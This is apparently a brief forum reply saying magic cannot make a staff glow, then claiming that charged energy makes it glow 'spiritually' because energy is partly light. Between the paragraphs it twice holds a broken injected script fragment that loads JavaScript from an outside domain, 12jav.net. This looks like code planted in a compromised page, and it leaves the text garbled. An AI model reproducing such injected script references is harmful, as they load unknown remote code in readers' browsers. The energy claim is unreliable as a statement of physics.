Are you asking how to make a staff glow using magic?

If so, you will be disappointed in the answer. Magic cannot make something glow. There must be a means for it to glow in the first place, and typically it would be easier to directly affect such a means rather than trying to use magic. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Nothing can physically manifest from magic, you could charge the staff with energy and spiritually it will glow because energy is part light.
